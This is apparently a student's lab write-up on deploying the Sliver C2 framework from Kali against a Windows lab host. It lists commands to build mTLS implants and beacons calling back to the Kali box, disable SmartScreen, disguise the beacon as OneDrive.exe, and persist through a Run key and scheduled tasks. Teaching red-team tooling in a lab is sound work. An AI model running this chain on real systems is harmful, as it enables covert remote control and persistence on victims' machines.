To start things off I made sure that the Kali box was connected to my LAN cable and I added the following for network settings:

Setting VyOS rules:

set interfaces ethernet eth0 address 192.168.1.3/24
set protocols rip interface eth0
set protocols rip network 192.168.1.1/24
set protocols static route 0.0.0.0/0 next-hop 192.168.1.3
set service dns forwarding allow-from 192.168.1.1/24
set service dns forwarding listen-address 192.168.1.1
set service dns forwarding system
set service ssh listen-address 0.0.0.0
set system name-server 192.168.1.1
delete protocols static route 0.0.0.0/0 next-hop 192.168.1.1 (had added this on accident)
set nat source rule 10 source address 192.168.1.0/24

note: if there is an ign next to a file being downloaded on the terminal that means that file is being ignored

Restart the network and the box will now be connected to the internet and we can move forward.

Installed Sliver using sudo apt install sliver --fix-missing

To get into Sliver enter sliver-server:

Deliverable 1.1:

What is the protocol and port number that the server is running on and can we change it to something different?

The protocol is TCP and the port number is 31337. Yes it can be changed to something different by using the listners commands to change it. But more on that later.

Creating a new operator on the "sliver-server" tab so I can use "sliver-client" on another window:

Command used:

To run "sliver-client" the following should be entered:

Then entering sliver-client on the command line should connect you:

Although nothing else should be running it is important to check that there are no more sessions running

First off we need to create a profile. We can do so by entering profiles new --mtls 192.168.1.10 --format exe --os windows --arch amd64 windows-session into the command line

Breakdown of the options (from the google doc):

• new: to tell Sliver we want to create a new profile
• mtls: the type of communication channel to be used
• format: the type of implant
• os: the targeted operating system
• arch: the architecture used by our targeted system
• windows-session: the name of our new profile (it could be anything of your choice)

Next we need to make the beacon profile which is done by entering profiles new beacon --mtls 192.168.1.10 --format exe --seconds 5 --jitter 3 --os windows --arch amd64 windows-beacon

Breakdown of the new options (from the google doc):

• seconds: duration to connect back to the C2
• jitter: randomize the call back to home
• windows-beacon: the name used for this profile (it could be anything of your choice)

We can ensure these went through properly by using the profiles command. This should present you with all the profiles.

Deliverable 2.1:

We can generate a beacon implant by using these 2 commands:

profiles generate --save ~/Public/imp1.exe windows-session
profiles generate --save ~/Public/beacon1.exe windows-beacon

note: I accidentally named my profile "windowws-session" (2 W's) instead of "widows-session" (1 W's) this doesn't cause issues but the commands might be different from what's shown in the pictures.

Deliverable 2.2:

Now it's time to get a directory prepared for our files.

To start we need to make a file in the /html/ directory using the command sudo mkdir /var/www/html/files

once that is made we need to copy the contents of ~/Public/*.exe into the "files" directory by using sudo cp ~/Public/*.exe /var/www/html/files We will also need to make sure that these directories have the proper permissions which we can do by using the commands sudo chmod -R 755 /var/www/html/files/

All commands used:

Now for the moment of truth. If everything has gone well up to this point we should be able to use the mtls command on the sliver-server and it will start job #2 which will be running on port 8888

Confirmation that this worked in my environment:

Now the listener is up and all the files we need are ready to go now on the victim system I'm testing (WKS1) I opened the browser to navigate to 192.168.1.10 (Kali system IP) and downloaded the implants

First, on imp1 I right-clicked and ran it as administrator and back on the Kali box we can now see that the implant is working when we use the sessions command

Now using the use command on sliver-client we can type use <session-id> and that'll connect us to the WKS1 machine

Deliverable 3.1:

We will want to disable Windows SmartScreen which can be done on the kali box through our session using the command execute -o REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v SmartScreenEnabled /t REG_SZ /d "Off"

Now we want to move beacon1.exe over to the windows machine under the name OneDrive.exe which we can accomplish by using upload '/var/www/html/files/beacon.exe' 'C:\Users\Public\OneDrive.exe' on the comm

Now we want to execute OneDrive.exe on the victim system which we can accomplish with the following: execute -o reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "OneDriveUpdater" /t REG_SZ /F /D "C:\Users\Public\OneDrive.exe"

Deliverable 4.1:

Now we need to add a fake network task and schedule it on the victim system which we can do by using the following: execute -o schtasks /Create /F /SC MINUTE /MO 3 /ST 18:00 /TN PingBing /TR "cmd.exe /c ping -c 10 bing.com"

The output should look something like this:

Now it's time to add the configuration to run imp1.exe but in this case, we're going to upload another schedule task for it which can be done by running the following commands:

upload '/var/www/html/files/implant.exe' 'C:\Users\Public\Downloads\Checkme.exe'

execute -o schtasks /Create /F /SC MINUTE /MO 3 /ST 18:00 /TN CheckMe /TR C:\Users\Public\Downloads\Checkme.exe

Upload:

Deliverable 4.2:

Getting system:

Once we run the command above there will be another session that opens up and we can now gain authoritative access.

Deliverable 4.3:

Overall, this was a pretty simple lab where I ran into very few roadblocks. In fact, the only time I had issues was when I was getting the new IP address on the Kali box working so I could connect to the Internet. Because of that experience, I know that I should really try to familiarize myself with the VyOS environment because I've had a lot of issues with it in the past.

Otherwise, this lab was nothing but beneficial. I genuinely really enjoy the Sliver software despite its quirks. Everything was easy to understand and I was able to grasp all of the information with ease. It was also something that I had never used previously so it was really fun to just mess with something new and gain a new skill.